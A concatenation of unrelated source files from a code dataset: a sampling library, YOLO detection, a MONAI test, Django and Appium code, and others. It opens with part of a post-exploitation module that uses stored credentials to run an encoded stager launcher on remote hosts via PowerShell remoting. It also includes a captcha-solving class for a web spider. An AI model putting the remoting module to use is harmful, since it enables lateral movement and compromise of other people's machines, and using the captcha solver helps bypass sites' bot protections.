'Comments': []
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'CredID' : {
'Description' : 'CredID from the store to use.',
'Required' : False,
'Value' : ''
},
'ComputerName' : {
'Description' : 'Host[s] to execute the stager on, comma separated.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'UserName' : {
'Description' : '[domain\]username to use to execute command.',
'Required' : False,
'Value' : ''
},
'Password' : {
'Description' : 'Password to use to execute command.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
userName = self.options['UserName']['Value']
password = self.options['Password']['Value']
script = """Invoke-Command """
# if a credential ID is specified, try to parse
credID = self.options["CredID"]['Value']
if credID != "":
if not self.mainMenu.credentials.is_credential_valid(credID):
print helpers.color("[!] CredID is invalid!")
return ""
(credID, credType, domainName, userName, password, host, os, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]
self.options["UserName"]['Value'] = str(domainName) + "\\" + str(userName)
self.options["Password"]['Value'] = password
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
if launcher == "":
return ""
else:
# build the PSRemoting execution string
computerNames = "\"" + "\",\"".join(self.options['ComputerName']['Value'].split(",")) + "\""
script += " -ComputerName @("+computerNames+")"
script += " -ScriptBlock {" + launcher + "}"
if self.options["UserName"]['Value'] != "" and self.options["Password"]['Value'] != "":
# add in the user credentials
script = "$PSPassword = \""+password+"\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Management.Automation.PSCredential(\""+userName+"\",$PSPassword);" + script + " -Credential $Credential"
script += ";'Invoke-PSRemoting executed on " +computerNames +"'"
return script
| [
"[email protected]"
] | |
ac49ac9a742dde207c205fdf63ceaf884a3a20e3 | 70ed9ef2867b2c0ca96596f8fdd75c31af5ac116 | /build/lib/ArticleSpider/zheye/__init__.py | 83954ea69947cd42adcc0f1dd46ef9f117c78f71 | [] | no_license | nanmuyao/ArticleSpider | b24aef4bbd761951dd1bd450e49de8f40c96f289 | a75cfaa028b1717636866b5833cdcaa29a2ec43a | refs/heads/master | 2021-07-24T16:16:20.597430 | 2017-11-05T08:01:53 | 2017-11-05T08:01:53 | 109,280,103 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,802 | py | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Recognizing class
from sklearn.mixture import GaussianMixture
from PIL import Image
from ArticleSpider.zheye import util
import numpy as np
class zheye:
def __init__(self):
''' load model '''
import os
import keras
full_path = os.path.realpath(__file__)
path, filename = os.path.split(full_path)
self.model = keras.models.load_model(path +'/zheyeV3.keras')
def Recognize(self, fn):
im = Image.open(fn)
im = util.CenterExtend(im, radius=20)
vec = np.asarray(im.convert('L')).copy()
Y = []
for i in range(vec.shape[0]):
for j in range(vec.shape[1]):
if vec[i][j] <= 200:
Y.append([i, j])
gmm = GaussianMixture(n_components=7, covariance_type='tied', reg_covar=1e2, tol=1e3, n_init=9)
gmm.fit(Y)
centers = gmm.means_
points = []
for i in range(7):
scoring = 0.0
for w_i in range(3):
for w_j in range(3):
p_x = centers[i][0] -1 +w_i
p_y = centers[i][1] -1 +w_j
cr = util.crop(im, p_x, p_y, radius=20)
cr = cr.resize((40, 40), Image.ANTIALIAS)
X = np.asarray(cr.convert('L'), dtype='float')
X = (X.astype("float") - 180) /200
x0 = np.expand_dims(X, axis=0)
x1 = np.expand_dims(x0, axis=3)
if self.model.predict(x1)[0][0] < 0.5:
scoring += 1
if scoring > 4:
points.append((centers[i][0] -20, centers[i][1] -20))
return points | [
"[email protected]"
] | |
0db2aa9ff306478ee3e5479f7c42bd343136846d | 795f0081004920c15c178c43b00432cb8e7ca586 | /controller/src/object_detection.py | 3d2d3f1083a94ede6cb0ff9622c6d4a24be2a5ba | [] | no_license | 60alex60/ECE140aLab6 | e6e9985a07e5615a5678d817cdfb031802322425 | f966af1d7aa87ab9f602bd3ad3f4cdea13ee7421 | refs/heads/master | 2023-04-05T15:31:52.014565 | 2021-03-05T05:41:31 | 2021-03-05T05:41:31 | 353,224,446 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,292 | py | import numpy as np
import cv2
import time
class ImgProc():
def __init__(self):
# read pre-trained model and config file
self.net = cv2.dnn.readNet("object_detection/yolov4-tiny.weights", "object_detection/yolov4-tiny.cfg")
# read class names from text file
self.classes = None
with open("object_detection/coco.names", 'r') as f:
self.classes = [line.strip() for line in f.readlines()]
# generate different colors for different classes
self.COLORS = np.random.uniform(0, 255, size=(len(self.classes), 3))
# function to get the output layer names
# in the architecture
def get_output_layers(self, net):
layer_names = net.getLayerNames()
output_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]
return output_layers
# function to draw bounding box on the detected object with class name
def draw_bounding_box(self, img, class_id, confidence, x, y, x_plus_w, y_plus_h):
label = str(self.classes[class_id])
color = self.COLORS[class_id]
cv2.rectangle(img, (x, y), (x_plus_w, y_plus_h), color, 2)
cv2.putText(img, label, (x - 10, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)
def detect_objects(self, img):
W = img.shape[1]
H = img.shape[0]
# create input blob
sz = (416, 416) # (224,224)
normalization = 1.0 / 255.0
blob = cv2.dnn.blobFromImage(img, normalization, sz, (0, 0, 0), True, crop=False)
# set input blob for the network
self.net.setInput(blob)
# run inference through the network
# and gather predictions from output layers
outs = self.net.forward(self.get_output_layers(self.net))
# initialization
class_ids = []
confidences = []
boxes = []
centroids = []
conf_threshold = 0.3
nms_threshold = 0.1
		# For each detection from each output layer, get the confidence, class id and bounding box params, and ignore weak detections (confidence <= conf_threshold)
for out in outs:
for detection in out:
scores = detection[5:]
class_id = np.argmax(scores)
confidence = scores[class_id]
if confidence > conf_threshold:
center_x = int(detection[0] * W)
center_y = int(detection[1] * H)
w = int(detection[2] * W)
h = int(detection[3] * H)
x = center_x - w / 2
y = center_y - h / 2
class_ids.append(class_id)
confidences.append(float(confidence))
boxes.append([x, y, w, h])
centroids.append((center_x, center_y))
# Apply non-max suppression to prevent duplicate detections
indices = cv2.dnn.NMSBoxes(boxes, confidences, conf_threshold, nms_threshold)
# Go through the detections remaining after NMS and draw bounding boxes
detections = []
frame = img.copy()
for i in indices:
i = i[0]
box = boxes[i]
x = box[0]
y = box[1]
w = box[2]
h = box[3]
self.draw_bounding_box(frame, class_ids[i], confidences[i], round(x), round(y), round(x + w), round(y + h))
detections.append((self.classes[class_ids[i]], centroids[i], box))
print("Detected Objects: ", detections)
return detections, frame
if __name__ == "__main__":
img = cv2.imread('sample_img.png')
imgProc = ImgProc()
imgProc.detect_objects(img)
| [
"66690702+github-classroom[bot]@users.noreply.github.com"
] | 66690702+github-classroom[bot]@users.noreply.github.com |
bfabb2739c171793041ee29b0c6b4b331220b17b | d60e74dae2c4bcef6bc7c8faea51dc6b245de42f | /package/inference/mc/population.py | 3e105cf0362f917f410e330bcc5f023dc5518596 | [] | no_license | tloredo/inference | 37664ef62317f32ad5ab25c56ead1c49bfc91045 | 215de4e93b5cf79a1e9f380047b4db92bfeaf45c | refs/heads/master | 2021-09-09T06:24:16.690338 | 2021-09-01T21:03:52 | 2021-09-01T21:03:52 | 142,254,094 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,441 | py | """
Classes and functions for describing and sampling discrete populations.
"""
# TODO: Distinguish sizes from weights (normalized).
__author__ = "Tom Loredo"
from numpy import array, random
from _ppssampler import _ppssampler, equalprob
from _ppssampler import set_rng_state, get_rng_state
from inference.utils.pl import pl
# try:
# import pylab as pl
# except ImportError:
# pl = None
__all__ = ['Population', 'Population1D']
class Population(object):
def __init__(self, items=None, weights=None):
if weights is None: # The equal probability case
self.equiprob = True
try: # items is a sequence
self.npopn = len(items)
self.items = items
except TypeError: # items is an int
self.npopn = int(items)
self.items = list(range(self.npopn))
elif items is None: # Use indices as items
self.equiprob = False
self.npopn = len(weights)
self.items = list(range(self.npopn))
self.weights = array(weights, float)
else: # Use a list of items *and* weights
self.equiprob = False
self.npopn = len(weights)
if len(items) != self.npopn:
raise ValueError('Lengths of items & weights must match!')
self.items = items
self.weights = array(weights, float)
self.did_init = False
self.did_Sampford_init = False
self.did_Sampford_tables = False
def sample(self, nsamp):
"""
Return a set of nsamp samples from the population, sampled with
replacement.
"""
# *** Implement equiprob case.
if self.equiprob:
raise NotImplementedError('Awaiting code...')
if not self.did_init:
self.sampler = _ppssampler(self.weights)
self.did_init = True
# Track the RNG state within the sampler, to update NumPy's RNG state.
# Internally we only use the MT state; any extra state for cached
# normal or other samples can just be copied.
rng_state = random.get_state()
mt_state, extra_state = rng_state[:3], rng_state[3:]
set_rng_state(*mt_state) # *** modify to handle full rng state
indices = self.sampler.sample(nsamp)
new_state = list(get_rng_state())
new_state.extend(extra_state)
random.set_state(new_state)
return [self.items[i] for i in indices]
def max_subset(self):
"""
Return the maximum sample size for PPS sampling without replacement.
The limiting size arises because PPS sampling without replacement
requires nsamp*(max normalized weight) <= 1. If this is violated
for the desired sample size, you may consider trimming the large
weight members from the population and including them in every
sample (of course, they will all have inclusion probability of
unity, regardless of size).
"""
if self.did_Sampford_init:
return int(1./self.max_wt)
else:
return int(sum(self.weights)/self.weights.max())
def subset_pps(self, nsamp):
"""
Return a sample of nsamp distinct items from the population, sampled
without replacement with probability proportional to size (PPS)
according to Sampford's sampling scheme.
"""
# Copy the whole population if nsamp = npopn.
if nsamp == self.npopn:
return [item for item in self.items]
set_rng_state(*random.get_state())
if self.equiprob:
pool = arange(self.npopn)
indices = equalprob(nsamp, pool)
else:
# This part of setup has to be done before any sampling.
if not self.did_init:
print('Initing ppssampler...')
self.sampler = _ppssampler(self.weights)
self.did_init = True
# This part has to be done before any sampling w/o replacement.
if not self.did_Sampford_init:
print('Initing wts...')
self.sort_indices, self.sort_wts, self.tot_wt = \
self.sampler.prepwts(self.weights)
self.max_wt = self.sort_wts[0]/self.tot_wt # Max wt, normed
self.nsamp = 0
self.did_Sampford_init = True
self.did_Sampford_tables = False
# This part has to be done when sample size changes.
if self.nsamp != nsamp:
print('Initing ratios...')
if nsamp > self.npopn:
raise ValueError('nsamp larger than population size!')
if nsamp*self.max_wt > 1:
raise ValueError('Sample size too large for PPS sampling!')
self.sampler.prepratios(nsamp, self.sort_wts, self.tot_wt)
self.did_Sampford_tables = False
self.nsamp = nsamp
self.ntry, sindices = self.sampler.samplenr()
indices = [self.sort_indices[i] for i in sindices]
result = [self.items[i] for i in indices]
random.set_state(get_rng_state())
return result
def subset_pps5(self, nsamp):
"""
Return a sample of nsamp distinct items from the population, sampled
without replacement with probability proportional to size (PPS)
according to Sampford's sampling scheme.
5-table lookup samplers are used within Sampford's algorithm to
accelerate the sampling for large populations.
"""
# Copy the whole population if nsamp = npopn.
if nsamp == self.npopn:
return [item for item in self.items]
set_rng_state(*random.get_state())
if self.equiprob:
pool = arange(self.npopn)
indices = equalprob(nsamp, pool)
else:
# This part of setup has to be done before any sampling.
if not self.did_init:
print('Initing ppssampler...')
self.sampler = _ppssampler(self.weights)
self.did_init = True
# This part has to be done before any sampling w/o replacement.
if not self.did_Sampford_init:
print('Initing wts...')
self.sort_indices, self.sort_wts, self.tot_wt = \
self.sampler.prepwts(self.weights)
self.max_wt = self.sort_wts[0]/self.tot_wt # Max wt, normed
self.nsamp = 0
self.did_Sampford_init = True
# This part has to be done when sample size changes.
if self.nsamp != nsamp:
print('Initing ratios...')
if nsamp > self.npopn:
raise ValueError('nsamp larger than population size!')
if nsamp*self.max_wt > 1:
raise ValueError('Sample size too large for PPS sampling!')
self.sampler.prepratios(nsamp, self.sort_wts, self.tot_wt)
self.sampler.prepratiotables()
self.did_Sampford_tables = True
self.nsamp = nsamp
# This may happen if subset_pps is called before subset_pps5.
if not self.did_Sampford_tables:
print('Initing ratio tables...')
self.sampler.prepratiotables()
self.did_Sampford_tables = True
self.ntry, indices = self.sampler.samplenr5()
# Note the 5-table version returns unsorted indices.
# indices = [self.sort_indices[i] for i in sindices]
result = [self.items[i] for i in indices]
random.set_state(get_rng_state())
return result
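# Editor's illustrative sketch -- not part of the original module. A minimal
# use of `Population`, assuming the compiled `_ppssampler` extension imports
# cleanly (this module already requires it):
#
#   pop = Population(items=['a', 'b', 'c'], weights=[5., 3., 2.])
#   draws = pop.sample(10)       # 10 PPS draws, with replacement
#   pop.max_subset()             # -> 2, since 10 / 5 = 2 caps nsamp
#   subset = pop.subset_pps(2)   # 2 distinct items via Sampford's scheme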
class Population1D(Population):
"""
A Population object specialized for populations indexed by a
single (1-D) real-valued quantity that gives the "size" of
each member.
"""
def __init__(self, vals, weights, err=None):
indices = array(vals).argsort()
self.vals = vals[indices].copy()
self.weights = array(weights)[indices].copy()
if err == None:
self.err = None
else:
self.err = array(err)[indices].copy()
Population.__init__(self, self.vals, self.weights)
self.cdf = self.weights.cumsum()
self.hazard = self.cdf[::-1].copy()
def haz_pts(self, start=None, end=None):
"""
Return arrays of points specifying the hazard dist'n over the range
[start, end]. The range must fully span the range of
detected values. Also return arrays of points specifying
error bars, if defined on creation.
"""
if start is None:
start = self.vals[0]
if end is None:
end = self.vals[-1]
        if start > self.vals[0] or end < self.vals[-1]:
raise ValueError('Range must span the range of sampled values!')
# Start the descending CDF.
absc, ord = [start], [1.]
# Add pairs of points for each uncensored value, defining jumps.
for x, p in zip(self.vals, self.hazard):
absc.extend([x, x])
ord.extend([ord[-1], p])
# The last step is zero.
absc.append(end)
ord.append(0.)
        if self.err is None:
return array(absc), array(ord)
else:
# For error bars, just copy the stored errors in the middle of
# the CDF bins.
eabsc = []
for i in range(len(self.vals)-1):
eabsc.append( .5*(self.vals[i]+self.vals[i+1]) )
eabsc.append( .5*(self.vals[-1]+end) )
return array(absc), array(ord), array(eabsc), self.hazard.copy(), \
self.err.copy()
def plot(self, start=None, end=None):
"""
Plot the hazard over the range [start,end], which must span
the range of uncensored values.
"""
if not pl:
raise RuntimeError('Cannot plot without pylab!')
if start is None:
start = self.vals[0]
if end is None:
end = self.vals[-1]
        if self.err is None:
a, o = self.haz_pts(start, end)
else:
a, o, ea, eo, ee = self.haz_pts(start, end)
pl.plot(a, o, 'b-', linewidth=2)
        if self.err is not None:
pl.errorbar(ea, eo, ee, fmt='o', markersize=0)
# ====== end of file | author: [email protected] ======
# ====== file: /78.py | repo: imhardikj/git_test | license: none | author: [email protected] ======
def greet_user(username):
"""Display a simple greeting."""
print("Hello, " + username.title() + "!")
greet_user('jesse')
# ====== file: /Misc/Raspberry Pi Things/Motors/stringComparison.py | repo: michael5486/Senior-Design | license: none | author: [email protected] ======
testVar = None
run = True
while run:
testVar = raw_input("Ask user for something.\n")
if testVar == "exit":
run = False
print "System Exiting..."
else:
        print testVar
# ====== file: /chapter9/SuperMattAdmin/ModelForm/urls.py | repo: MMingLeung/Python_Study | license: MIT | author: [email protected] ======
"""ModelForm URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from app01 import views
from supermatt.service import test_v1
urlpatterns = [
# url(r'^admin/', admin.site.urls),
    # include: if the argument is a module path, the module is imported, its
    # urlpatterns variable is looked up, and that list is used
# url(r'^test/$', include('app01.urls')),
    # it can also be written like this:
# url(r'^test/$', ([
# url(r'^test/', views.test),
# url(r'^test/', views.test),
# url(r'^test/', views.test),
# ],'app_name','name_space')),
url(r'^su/', test_v1.site.urls),
url(r'^test/', views.test),
url(r'^test2/', views.test2),
]
# ====== file: /cyly/test1.py | repo: latata666/newcoder | license: none | author: [email protected] ======
# -*- coding: utf-8 -*-
# @Time : 2020/5/15 10:41
# @Author : Mamamooo
# @Site :
# @File : test1.py
# @Software: PyCharm
"""
"""
import logging
# create logger with 'spam_application'
logger = logging.getLogger('spam_application')
logger.setLevel(logging.DEBUG)
# create file handler which logs even debug messages
fh = logging.FileHandler('spam.log')
fh.setLevel(logging.DEBUG)
# create console handler with a higher log level
ch = logging.StreamHandler()
ch.setLevel(logging.ERROR)
# create formatter and add it to the handlers
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(fh)
logger.addHandler(ch)
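# With these levels, the two INFO records below reach spam.log only;
# the console handler only lets ERROR and above through.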
logger.info('creating an instance of auxiliary_module.Auxiliary')
logger.info('done with auxiliary_module.some_function()')
# ====== file: /synapse/tools/server.py | repo: drstrng/synapse | license: Apache-2.0 | author: [email protected] ======
import sys
import argparse
import importlib
import synapse.link as s_link
import synapse.cortex as s_cortex
import synapse.daemon as s_daemon
def main(argv):
p = argparse.ArgumentParser(prog='server')
p.add_argument('--initmod',help='python module name for daemon init callback')
p.add_argument('--cortex', action='append', default=[], help='cortex name,url to share for RMI')
p.add_argument('linkurl',nargs='+',help='link urls to bind/listen')
opts = p.parse_args(argv)
daemon = s_daemon.Daemon()
# possibly load/share a cortex or two
for nameurl in opts.cortex:
name,url = nameurl.split(',',1)
core = s_cortex.openurl(url)
daemon.addSharedObject(name,core)
# fire up requested link servers
for url in opts.linkurl:
link = s_link.chopLinkUrl(url)
daemon.runLinkServer(link)
if opts.initmod:
mod = importlib.import_module(opts.initmod)
        meth = getattr(mod, 'initDaemon', None)
        if meth is None:
            print('error: initmod (%s) has no initDaemon() function!' % opts.initmod)
return
# call back the daemon init module
meth(daemon)
try:
daemon.wait()
    except KeyboardInterrupt:
print('ctrl-c caught: shutting down')
daemon.fini()
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
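# Hypothetical invocation (URL schemes depend on what synapse.link supports):
#   python -m synapse.tools.server --cortex core0,ram:// tcp://0.0.0.0:45000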
# ====== file: /Lab/venv/lib/python3.8/site-packages/OpenGL/raw/GLES2/EXT/sRGB.py | repo: BartoszRudnik/GK | license: none | author: [email protected] ======
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p
from OpenGL.constant import Constant as _C
# Code generation uses this
# End users want this...
from OpenGL.raw.GLES2 import _errors
_EXTENSION_NAME = 'GLES2_EXT_sRGB'
def _f(function):
return _p.createFunction(function, _p.PLATFORM.GLES2, 'GLES2_EXT_sRGB', error_checker=_errors._error_checker)
GL_FRAMEBUFFER_ATTACHMENT_COLOR_ENCODING_EXT = _C('GL_FRAMEBUFFER_ATTACHMENT_COLOR_ENCODING_EXT', 0x8210)
GL_SRGB8_ALPHA8_EXT = _C('GL_SRGB8_ALPHA8_EXT', 0x8C43)
GL_SRGB_ALPHA_EXT = _C('GL_SRGB_ALPHA_EXT', 0x8C42)
GL_SRGB_EXT = _C('GL_SRGB_EXT', 0x8C40)
# ====== file: /tests/test_integration_lazy_samples.py | repo: Project-MONAI/MONAI | license: Apache-2.0 | author: [email protected] ======
# Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import annotations
import os
import shutil
import tempfile
import unittest
from glob import glob
import nibabel as nib
import numpy as np
import torch
import monai
import monai.transforms as mt
from monai.data import create_test_image_3d, decollate_batch
from monai.transforms.utils import has_status_keys
from monai.utils import TraceStatusKeys, set_determinism
from tests.utils import HAS_CUPY, DistTestCase, SkipIfBeforePyTorchVersion, skip_if_quick
def _no_op(x):
return x
def run_training_test(root_dir, device="cuda:0", cachedataset=0, readers=(None, None), num_workers=4, lazy=True):
print(f"test case: {locals()}")
images = sorted(glob(os.path.join(root_dir, "img*.nii.gz")))
segs = sorted(glob(os.path.join(root_dir, "seg*.nii.gz")))
train_files = [{"img": img, "seg": seg} for img, seg in zip(images[:20], segs[:20])]
device = "cuda:0" if HAS_CUPY and torch.cuda.is_available() else "cpu" # mode 0 and cuda requires CUPY
num_workers = 0 if torch.cuda.is_available() else num_workers
# define transforms for image and segmentation
lazy_kwargs = {
"img": {"mode": "bilinear", "device": device, "padding_mode": "border", "dtype": torch.float32},
"seg": {"mode": 0, "device": device, "padding_mode": "nearest", "dtype": torch.uint8},
}
train_transforms = mt.Compose(
[
mt.LoadImaged(keys=["img", "seg"], reader=readers[0], image_only=True),
mt.EnsureChannelFirstd(keys=["img", "seg"]),
mt.Spacingd(
keys=["img", "seg"],
pixdim=[1.2, 0.8, 0.7],
mode=["bilinear", 0],
padding_mode=("border", "nearest"),
dtype=np.float32,
),
mt.Orientationd(keys=["img", "seg"], axcodes="ARS"),
mt.RandRotate90d(keys=["img", "seg"], prob=1.0, spatial_axes=(1, 2)),
mt.ScaleIntensityd(keys="img"),
mt.ApplyPendingd(keys=["seg"]),
mt.RandCropByPosNegLabeld(
keys=["img", "seg"], label_key="seg", spatial_size=[76, 82, 80], pos=1, neg=1, num_samples=4
),
mt.RandRotate90d(keys=["img", "seg"], prob=0.8, spatial_axes=(0, 2)),
mt.RandZoomd(
keys=["img", "seg"], prob=1.0, min_zoom=1.0, max_zoom=1.0, mode=("trilinear", 0), keep_size=True
),
mt.ResizeWithPadOrCropD(keys=["img", "seg"], spatial_size=[80, 72, 80]),
mt.Rotated(keys=["img", "seg"], angle=[np.pi / 2, np.pi / 2, 0], mode="nearest", keep_size=False),
mt.Lambdad(keys=["img"], func=_no_op),
],
lazy=lazy,
overrides=lazy_kwargs,
log_stats=num_workers > 0,
)
# create a training data loader
if cachedataset == 2:
train_ds = monai.data.CacheDataset(
data=train_files, transform=train_transforms, cache_rate=0.8, runtime_cache=False, num_workers=0
)
elif cachedataset == 3:
train_ds = monai.data.LMDBDataset(data=train_files, transform=train_transforms, cache_dir=root_dir)
else:
train_ds = monai.data.Dataset(data=train_files, transform=train_transforms)
# create UNet, DiceLoss and Adam optimizer
model = monai.networks.nets.UNet(
spatial_dims=3, in_channels=1, out_channels=1, channels=(2, 2, 2, 2), strides=(2, 2, 2), num_res_units=2
).to(device)
optimizer = torch.optim.Adam(model.parameters(), 5e-4)
loss_function = monai.losses.DiceLoss(sigmoid=True)
saver = mt.SaveImage(
output_dir=os.path.join(root_dir, "output"),
dtype=np.float32,
output_ext=".nii.gz",
output_postfix=f"seg_{lazy}_{num_workers}",
mode="bilinear",
resample=False,
separate_folder=False,
print_log=False,
)
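    # Invertd maps the "seg" predictions back through the last five (spatial)
    # transforms of the training pipeline.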
inverter = mt.Invertd(
keys="seg", orig_keys="img", transform=mt.Compose(train_transforms.transforms[-5:]), to_tensor=True
)
# use batch_size=2 to load images and use RandCropByPosNegLabeld to generate 2 x 4 images for network training
_g = torch.Generator()
_g.manual_seed(0)
set_determinism(0)
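    # fixed seeds: the lazy and non-lazy runs must see identical shuffling
    # and random augmentations so their outputs can be compared elementwise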
train_loader = monai.data.DataLoader(
train_ds, batch_size=1, shuffle=True, num_workers=num_workers, generator=_g, persistent_workers=num_workers > 0
)
all_coords = set()
batch_data = None
for epoch in range(5):
print("-" * 10)
print(f"Epoch {epoch + 1}/5")
for step, batch_data in enumerate(train_loader, start=1):
inputs, labels = batch_data["img"].to(device), batch_data["seg"].to(device)
optimizer.zero_grad()
outputs = model(inputs)
loss = loss_function(outputs, labels)
loss.backward()
optimizer.step()
epoch_len = len(train_ds) // train_loader.batch_size
print(f"{step}/{epoch_len}, train_loss:{loss.item():0.4f}")
for item, in_img, in_seg in zip(outputs, inputs, labels): # this decollates the batch, pt 1.9+
item.copy_meta_from(in_img)
np.testing.assert_array_equal(item.pending_operations, [])
np.testing.assert_array_equal(in_seg.pending_operations, [])
ops = [0]
if len(item.applied_operations) > 1:
found = False
for idx, n in enumerate(item.applied_operations): # noqa
if n["class"] == "RandCropByPosNegLabel":
found = True
break
if found:
ops = item.applied_operations[idx]["extra_info"]["extra_info"]["cropped"]
img_name = os.path.basename(item.meta["filename_or_obj"])
coords = f"{img_name} - {ops}"
print(coords)
# np.testing.assert_allclose(coords in all_coords, False)
all_coords.add(coords)
saver(item) # just testing the saving
saver(in_img)
saver(in_seg)
invertible, reasons = has_status_keys(batch_data, TraceStatusKeys.PENDING_DURING_APPLY)
inverted = [inverter(b_data) for b_data in decollate_batch(batch_data)] # expecting no error
return ops
@skip_if_quick
@SkipIfBeforePyTorchVersion((1, 11))
class IntegrationLazyResampling(DistTestCase):
def setUp(self):
monai.config.print_config()
set_determinism(seed=0)
self.data_dir = tempfile.mkdtemp()
for i in range(3):
im, seg = create_test_image_3d(128, 128, 128, num_seg_classes=1, channel_dim=-1)
n = nib.Nifti1Image(im, np.eye(4))
nib.save(n, os.path.join(self.data_dir, f"img{i:d}.nii.gz"))
n = nib.Nifti1Image(seg, np.eye(4))
nib.save(n, os.path.join(self.data_dir, f"seg{i:d}.nii.gz"))
self.device = "cuda:0" if torch.cuda.is_available() else "cpu:0"
def tearDown(self):
set_determinism(seed=None)
shutil.rmtree(self.data_dir)
def train_and_infer(self, idx=0):
results = []
_readers = (None, None)
_w = 2
if idx == 1:
_readers = ("itkreader", "itkreader")
_w = 1
elif idx == 2:
_readers = ("itkreader", "nibabelreader")
_w = 0
results_expected = run_training_test(
self.data_dir, device=self.device, cachedataset=0, readers=_readers, num_workers=_w, lazy=False
)
results = run_training_test(
self.data_dir, device=self.device, cachedataset=idx, readers=_readers, num_workers=_w, lazy=True
)
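        # lazy resampling must reproduce the eager pipeline's crop coordinates exactly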
self.assertFalse(np.allclose(results, [0]))
self.assertFalse(np.allclose(results_expected, [0]))
np.testing.assert_allclose(results, results_expected)
lazy_files = glob(os.path.join(self.data_dir, "output", "*_True_*.nii.gz"))
regular_files = glob(os.path.join(self.data_dir, "output", "*_False_*.nii.gz"))
diffs = []
for a, b in zip(sorted(lazy_files), sorted(regular_files)):
img_lazy = mt.LoadImage(image_only=True)(a)
img_regular = mt.LoadImage(image_only=True)(b)
diff = np.size(img_lazy) - np.sum(np.isclose(img_lazy, img_regular, atol=1e-4))
diff_rate = diff / np.size(img_lazy)
diffs.append(diff_rate)
np.testing.assert_allclose(diff_rate, 0.0, atol=0.03)
print("volume diff:", diffs)
def test_training(self):
for i in range(4):
self.train_and_infer(i)
if __name__ == "__main__":
unittest.main()
# ====== file: /前后端分离-vue-DRF/Projects-lenongke/LNK/apps/users/signals.py | repo: Suijng/1809_data | license: none | author: [email protected] ======
# post_save: fires automatically after a Django model object is saved
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.contrib.auth import get_user_model
# get the active user model
User = get_user_model()

@receiver(post_save, sender=User)  # watch saves on the User model
def create_user(sender, instance=None, created=False, **kwargs):
    # created: True only on the first save of a new instance
    if created:
        # take the raw password set on the instance
        password = instance.password
        # hash it
        instance.set_password(password)
        # save again (this re-fires post_save, but with created=False, so it does not loop)
        instance.save()
"[email protected]"
] | |
# ====== file: /YunluFramework/public/handle/renmai/RENMAIHANDLE5.py | repo: xiao2912008572/Appium | license: none | author: [email protected] ======
__author__ = 'Administrator'
from YunluFramework.public.handle.renmai.RENMAIHANDLE4 import RENMAIHANDLE4
class RENMAIHANDLE5(RENMAIHANDLE4):
    #********** [PAGE4] Contacts home - Search - tag list - enter group chat - Settings: RMSY_search_label_groupchat_menu_setting **********
    # Locator: Contacts home - Search - tag list - enter group chat - Settings - group avatar: click
    def RMSY_search_label_groupchat_menu_setting_grouphead_click(self):
        return self.p.click(self.RMSY_search_label_groupchat_menu_setting_grouphead)

    # Locator: ... - Settings - back: click
    def RMSY_search_label_groupchat_menu_setting_back_click(self):
        return self.p.click(self.RMSY_search_label_groupchat_menu_setting_back)

    # Locator: ... - Settings - group name: click
    def RMSY_search_label_groupchat_menu_setting_groupname_click(self):
        return self.p.click(self.RMSY_search_label_groupchat_menu_setting_groupname)

    #********** [PAGE4] Contacts home - Search - tag list - enter group chat - heat settings: RMSY_search_label_groupchat_menu_heatsetting **********
    # Locator: Contacts home - Search - tag list - enter group chat - heat settings - back: click
    def RMSY_search_label_groupchat_menu_heatsetting_back_click(self):
        return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_back)

    # Locator: ... - heat settings - message: click
    def RMSY_search_label_groupchat_menu_heatsetting_msg_click(self):
        return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_msg)

